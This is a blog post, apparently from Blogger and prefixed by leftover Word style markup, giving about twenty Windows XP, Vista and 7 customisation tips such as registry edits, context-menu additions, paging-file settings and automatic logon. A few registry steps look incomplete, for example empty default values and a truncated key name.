<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 1;">
<span style="font-size: x-large;"><b><span style="color: black; font-family: "Times New Roman","serif"; font-size: 24.0pt; mso-fareast-font-family: "Times New Roman"; mso-font-kerning: 18.0pt;">20 tricks and hacks for all Windows O.S</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 3;">
<span style="font-size: x-large;"><b><span style="color: black; font-family: "Times New Roman","serif"; font-size: 13.5pt; mso-fareast-font-family: "Times New Roman";">PC & laptop to make it run the way you want</span></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="color: black; font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><br /></span></div>
Lets take you through the hidden tweaks in Windows<br />
<br />
Treaking enables you to make Windows do interesting and useful things that it doesn't necessarily do directly out of the box.<br />
<br />
Some tweaks are easier to action than others but all of them help you to customize your PC and make it run closer to the way you'd like.<br />
<br />
HERES' THE SECRET<br />
<br />
*. Remove programs from Open with…<br />
<br />
You can remove unwanted programs that appear on the Open with… list when you're trying to open an unknown program.<br />
<br />
In the Registry, browse to HKEY_CLASSES_ ROOT\Applications and you'll see a list of programs installed on your PC as subkeys in the left-hand pane.<br />
<br />
To remove an unwanted program from this list, select it and then right-click in the right-hand pane. Choose New > String Value, and name it "NoOpenWith".<br />
<br />
<br />
**. Copy to folder<br />
<br />
Add a "Copy to folder" option to the context menu so you can right-click a file to quickly copy it.<br />
<br />
In Registry Editor, browse to HKEY_CLASSES_ ROOT\AllFilesystemObjects\shellex\ContextMenu Handlers, and create a new key called Copy to.<br />
<br />
Change its (Default) value to "" and check it works.<br />
<br />
<br />
<br />
***. Move to folder<br />
<br />
You can also add a "Move to folder" option in this way.<br />
<br />
From the same ContextMenuHandlers key as in tip 2, create a new key called "Move to" and change its (Default) value to "".<br />
<br />
****. Quick folder Properties<br />
<br />
To move quickly to a folder's Properties dialog, double-click it and hold down [Alt].<br />
<br />
<br />
*****. Correct file sorting<br />
<br />
By default, a file named 2.jpg is sorted after one called 20.jpg. Many people work around this by starting single digit numbers in file names with a leading zero, but you can change this behaviour by making a Registry edit.<br />
<br />
Browse to the Registry key HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explore.<br />
<br />
Then create a new DWORD value and name it "NoStrCmpLogical". Right-click and modify its value to "1".<br />
<br />
V*. Change the mouse pointer in Vista and Windows 7<br />
<br />
Right-click the desktop and choose Personalize > Mouse Pointers. Select the scheme you want to use from the drop-down list. You can modify individual pointers by selecting one in the current scheme and clicking Browse – then replace this with any static cursor file with the extension .CUR, or an animated cursor file, which will have the .ANI file extension.<br />
<br />
You can also download sets of mouse pointers online. These are generally distributed in sets of .CUR or .ANI files, grouped together in a zip archive. Download the file, unzip it and then replace the pointers you want to with the new files as in the above tip. A good place to start looking is here.<br />
<br />
You can also make your own cursor files by creating suitable bitmap images in a graphics program and saving them with the .CUR extension.<br />
<br />
<br />
V**. Mouse pointers in XP<br />
<br />
To change the mouse pointer scheme in Windows XP, open Control Panel and switch to Classic View. Double-click Mouse and choose the Pointer tab.<br />
<br />
V***. Send To expansion<br />
<br />
When you right-click a file or folder in Windows 7 and choose Send To, there's a limited number of options. But hold down [Shift] as you right-click and you'll open an expanded menu containing My Documents, Downloads and more useful locations.<br />
<br />
V****. Edit your theme<br />
<br />
Right-click anywhere on the desktop and choose Personalize > Theme. Select an option from the drop-down list to use an existing theme.<br />
<br />
Alternatively, choose "Window Colour and Appearance", open the Classic Appearance dialog to select a classic scheme and modify fonts and colours. Click Advanced. Pick the item you want to modify and enter the new colour or font. <br />
<br />
VV. Folder toolbar<br />
<br />
This tweak enables you to turn any folder on your hard drive into a toolbar, similar to the Quick Launch toolbar that gives you quick and easy access to the folder's contents.<br />
<br />
First, minimise all your open windows, then move the mouse pointer to the Taskbar and right-click it. Choose Toolbars > New Toolbar from the expanding menu, which will launch the New Toolbar dialog.<br />
<br />
Now select the item you want to use as a toolbar. If necessary, browse through My Documents or My Computer to find the folder you want. Alternatively, you can click "Make new folder" to create a custom one with specific contents.<br />
<br />
Click OK, and your new toolbar appears as a button on the Windows Taskbar, then click this to see an expanding menu of its contents. Sub-folders also become their own expanding menus, and you can then select a particular file to open it in its associated application.<br />
<br />
VV*. Active windows<br />
<br />
Press [Alt] + [Esc] to cycle through your active items in the order in which they were opened. Then press [Alt] + [Tab] to pick the window you want to work on.<br />
<br />
VV**. Hanging time<br />
<br />
By default, Windows waits for five seconds to allow time for any hung applications to be closed when you shut down your computer.<br />
<br />
If you want to reduce this period of time slightly, you can change the length with a quick Registry edit, so browse to HKEY_CURRENT_ USER\Control Panel\Desktop. In Vista, create a string entry called "HungAppTimeout" (if you use XP, it's already there).<br />
<br />
Right-click this and choose Modify. The number is in milliseconds, so the default of 5000 equates to a wait of five seconds. If you're using Windows 7, you should avoid using this tweak, because it causes glitches.<br />
<br />
VV***. Tweak performance<br />
<br />
1. Best performance<br />
<br />
Choose Start, right-click Computer and go to Properties > Advanced system settings. In Performance, click Settings > Visual Effects. Tick "Adjust for best performance". This removes most animations to improve PC performance.<br />
<br />
2. Processor scheduling<br />
<br />
In the Advanced tab, both Processor Scheduling and Memory usage are optimised for programs' performance. Change to Background services and System cache if you use your PC as a server, and programs' performance is secondary.<br />
<br />
3. Virtual memory<br />
<br />
In Virtual Memory, click Change > Custom size, and enter an upper and lower limit for your virtual memory. Try one and a half times the amount of RAM as your lower limit, and two to three times your RAM for the upper limit.<br />
<br />
VV****. Disable paging file<br />
If you're running a 64-bit version of Windows, have more than 4GB RAM installed, and don't perform memory-intensive operations, you could improve performance by disabling the paging file. In "Advanced system settings", choose Performance > Advanced, click Change under Virtual memory and choose "No paging file".<br />
<br />
VVV. Clear paging file at shutdown<br />
<br />
Windows uses the paging file on your hard drive as if it were RAM, and this routinely holds temporary data to free up your RAM. When you shut down your PC, this file is normally preserved, which can lead to inefficiency, because it slowly clutters up your system.<br />
<br />
If your data is sensitive, this could also be a security threat, since it remains accessible even after you've deleted or destroyed the files it contains.<br />
<br />
This edit flushes out the swap file whenever you shut down. Open the Registry Editor and browse to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.<br />
<br />
This contains a number of configurations for RAM and virtual memory. Either create or modify the DWORD value called "ClearPageFileAtShutdown", which defines whether the memory flush happens. To turn it on, set the value to "1".<br />
<br />
VVV*. Quick access to Task Manager<br />
<br />
You may be used to accessing Task Manager by pressing [Ctrl] + [Alt] + [Del] and then selecting it from the resulting screen. You can also get quick access to it that's less intrusive, however – rightclick the Taskbar and choose Task Manager.<br />
<br />
VVV**. Change user picture<br />
<br />
Click the Start button and then click your user picture. In the resulting dialog, choose Change your picture > Browse for more pictures. Locate the photo you want to use and click OK. Click Change Picture, followed by OK to confirm your choice.<br />
<br />
VVV***. Autohide the Taskbar<br />
<br />
You can free up more screen space by hiding the Taskbar. Right-click it, choose Properties and select Auto-hide. To access it when you want it, just drag the mouse to the bottom of your screen and it'll pop up.<br />
<br />
VVV****. Get past the welcome screen<br />
<br />
You can automatically log on and bypass the welcome screen with this simple tweak. Choose Start > Run and type "control userpasswords2" into the Open bar.<br />
<br />
Click OK to see a dialog with each user installed on the PC. Clear the box marked "Users must enter a username and password to use this computer". Click OK. Now restart, and you'll go directly to your desktop.<br />
<span style="color: black;">©Prasoon nigam</span><br />
XX. Custom keyboard shortcuts<br />
Works with: XP, Vista, Windows 7<br />
<br />
Create keyboard shortcuts to launch any program shortcut. Right-click the shortcut icon and choose Properties. Select the Shortcut key box and press a letter on the keyboard, (such as [H]) and click OK. Now [Ctrl] + [Alt] + [H] will launch the shortcut. </div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com4